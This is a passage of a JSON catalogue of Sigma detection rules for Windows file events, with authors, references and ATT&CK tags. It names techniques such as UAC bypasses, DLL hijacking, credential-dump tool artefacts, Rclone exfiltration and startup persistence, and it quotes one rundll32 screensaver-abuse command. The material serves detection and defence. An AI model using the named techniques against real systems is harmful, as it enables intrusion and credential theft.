"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" ], "tags": [ "attack.persistence", "attack.t1547.009" ] }, "related": [ { "dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "value": "Creation Exe for Service with Unquoted Path" }, { "description": "Detects the creation or modification of the Windows Terminal Profile settings file \"settings.json\" by an uncommon process.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-22", "falsepositive": [ "Some false positives may occur with admin scripts that set WT settings." ], "filename": "file_event_win_susp_windows_terminal_profile.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1550836225652686848", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml" ], "tags": [ "attack.persistence", "attack.t1547.015" ] }, "related": [ { "dest-uuid": "84601337-6a55-4ad7-9c35-79e0d1ea2ab3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b64de98-9db3-4033-bd7a-f51430105f00", "value": "Windows Terminal Profile Settings Modification By Uncommon Process" }, { "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", "meta": { "author": "elhoim", "creation_date": "2022-04-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_default_gpo_dir_write.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/intelligence-insights-november-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" ], "tags": [ "attack.t1036.005", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", "value": "Suspicious Files in Default GPO Folder" }, { "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "creation_date": "2022-04-27", "falsepositive": [ "The installation of new screen savers by third party software" ], "filename": "file_event_win_new_scr_file.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Libraries/Desk/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_scr_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", "value": "SCR File Write Event" }, { "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "value": "Wmiprvse Wbemcomn DLL Hijack - File" }, { "description": "Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.", "meta": { "author": "frack113", "creation_date": "2023-05-09", "falsepositive": [ "False positives will differ depending on the environment and scripts used. Apply additional filters accordingly." ], "filename": "file_event_win_powershell_drop_powershell.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_drop_powershell.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "576426ad-0131-4001-ae01-be175da0c108", "value": "PowerShell Script Dropped Via PowerShell.EXE" }, { "description": "Detects the creation of a new PowerShell module in the first folder of the module directory structure \"\\WindowsPowerShell\\Modules\\malware\\malware.psm1\". This is somewhat an uncommon practice as legitimate modules often includes a version folder.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-09", "falsepositive": [ "False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production." ], "filename": "file_event_win_powershell_module_susp_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "e8a52bbd-bced-459f-bd93-64db45ce7657", "value": "Potential Suspicious PowerShell Module File Created" }, { "description": "Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.", "meta": { "author": "Beyu Denis, oscd.community, Tim Shelton, Thurein Oo", "creation_date": "2019-10-22", "falsepositive": [ "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "filename": "file_event_win_webshell_creation_detect.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "PT ESC rule and personal experience", "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "value": "Potential Webshell Creation On Static Website" }, { "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", "meta": { "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "creation_date": "2022-04-27", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_eventvwr.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "value": "UAC Bypass Using EventVwr" }, { "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", "meta": { "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "creation_date": "2020-03-19", "falsepositive": [ "Operations performed through Windows SCCM or equivalent", "Read only access list authority" ], "filename": "file_event_win_susp_desktop_ini.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml" ], "tags": [ "attack.persistence", "attack.t1547.009" ] }, "related": [ { "dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81315b50-6b60-4d8f-9928-3466e1022515", "value": "Suspicious desktop.ini Action" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "file_event_win_remote_access_tools_screenconnect_artefact.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", "value": "ScreenConnect Temporary Installation Artefact" }, { "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", "meta": { "author": "HieuTT35, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-24", "falsepositive": [ "System administrator creating Powershell profile manually" ], "filename": "file_event_win_susp_powershell_profile.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://persistence-info.github.io/Data/powershellprofile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.013" ] }, "related": [ { "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5b78988-486d-4a80-b991-930eff3ff8bf", "value": "PowerShell Profile Modification" }, { "description": "Detects the creation of a new Outlook form which can contain malicious code", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2021-06-10", "falsepositive": [ "Legitimate use of outlook forms" ], "filename": "file_event_win_office_outlook_newform.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form", "https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml" ], "tags": [ "attack.persistence", "attack.t1137.003" ] }, "related": [ { "dest-uuid": "a9e2cea0-c805-4bf8-9e31-f5f0513a3634", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", "value": "Potential Persistence Via Outlook Form" }, { "description": "Detects Rclone config files being created", "meta": { "author": "Aaron Greetham (@beardofbinary) - NCC Group", "creation_date": "2021-05-26", "falsepositive": [ "Legitimate Rclone usage" ], "filename": "file_event_win_rclone_config_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_config_files.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "value": "Rclone Config File Creation" }, { "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", "meta": { "author": "Greg (rule)", "creation_date": "2022-07-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ripzip_attack.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" ], "tags": [ "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", "value": "Potential RipZip Attack on Startup Folder" }, { "description": "Detects default CSExec service filename which indicates CSExec service installation and execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-04", "falsepositive": [ "Unknown" ], "filename": "file_event_win_csexec_service.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/malcomvetter/CSExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csexec_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0e2b768-5220-47dd-b891-d57b96fc0ec1", "value": "CSExec Service File Creation" }, { "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "System administrators managing certificates." ], "filename": "file_event_win_susp_pfx_file_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/14", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" ], "tags": [ "attack.credential-access", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", "value": "Suspicious PFX File Creation" }, { "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_msconfig_gui.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f", "value": "UAC Bypass Using MSConfig Token Modification - File" }, { "description": "Detects Octopus Scanner Malware.", "meta": { "author": "NVISO", "creation_date": "2020-06-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_mal_octopus_scanner.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" ], "tags": [ "attack.t1195", "attack.t1195.001" ] }, "related": [ { "dest-uuid": "3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "191cc6af-1bb2-4344-ab5f-28e496638720", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", "value": "Octopus Scanner Malware" }, { "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-02-21", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_tsclient_filewrite_startup.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", "value": "Hijack Legit RDP Session to Move Laterally" }, { "description": "Detects the creation of a file with the \".dll\" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of \"System32\", \"SysWOW64\", etc.).\nIt is highly recommended to perform an initial baseline before using this rule in production.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-24", "falsepositive": [ "Third party software might bundle specific versions of system DLLs." ], "filename": "file_event_win_creation_system_dll_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13c02350-4177-4e45-ac17-cf7ca628ff5e", "value": "Files With System DLL Name In Unsuspected Locations" }, { "description": "Detects the creation of a file with the name \"code_tunnel.json\" which indicate execution and usage of VsCode tunneling utility by an \"Image\" or \"Process\" other than VsCode.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Unknown" ], "filename": "file_event_win_vscode_tunnel_renamed_execution.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml" ], "tags": [ "attack.command-and-control" ] }, "uuid": "d102b8f5-61dc-4e68-bd83-9a3187c67377", "value": "Renamed VsCode Code Tunnel Execution - File Indicator" }, { "description": "Detects Windows executables that write files with suspicious extensions", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_shell_write_susp_files_extensions.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "value": "Windows Binaries Write Suspicious Extensions" }, { "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-29", "falsepositive": [ "Legitimate custom SHIM installations will also trigger this rule" ], "filename": "file_event_win_creation_new_shim_database.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", "https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence", "https://liberty-shell.com/sec/2020/02/25/shim-persistence/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" ], "tags": [ "attack.persistence", "attack.t1547.009" ] }, "related": [ { "dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", "value": "New Custom Shim Database Created" }, { "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_consent_comctl32.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "value": "UAC Bypass Using Consent and Comctl32 - File" }, { "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE", "creation_date": "2021-10-24", "falsepositive": [ "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "filename": "file_event_win_powershell_startup_shortcuts.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", "https://redcanary.com/blog/intelligence-insights-october-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "value": "Potential Startup Shortcut Persistence Via PowerShell.EXE" }, { "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-11-01", "falsepositive": [ "Legitimate Administrator using tool for password recovery" ], "filename": "file_event_win_cred_dump_tools_dropped_files.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.t1003.002", "attack.t1003.003", "attack.t1003.004", "attack.t1003.005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "value": "Cred Dump Tools Dropped Files" }, { "description": "Detects the presence and execution of Inveigh via dropped artefacts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-24", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_hktl_inveigh_artefacts.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", "value": "HackTool - Inveigh Execution Artefacts" }, { "description": "Detects programs on a Windows system that should not write scripts to disk", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-08-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_legitimate_app_dropping_script.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d604714-e071-49ff-8726-edeb95a70679", "value": "Legitimate Application Dropped Script" }, { "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_errorhandler_persistence.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/last-byte/PersistenceSniper", "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_errorhandler_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "15904280-565c-4b73-9303-3291f964e7f9", "value": "Potential Persistence Attempt Via ErrorHandler.Cmd" }, { "description": "Detects the creation of files with an \"LNK\" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the \"LNK\" extension by default.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2022-11-07", "falsepositive": [ 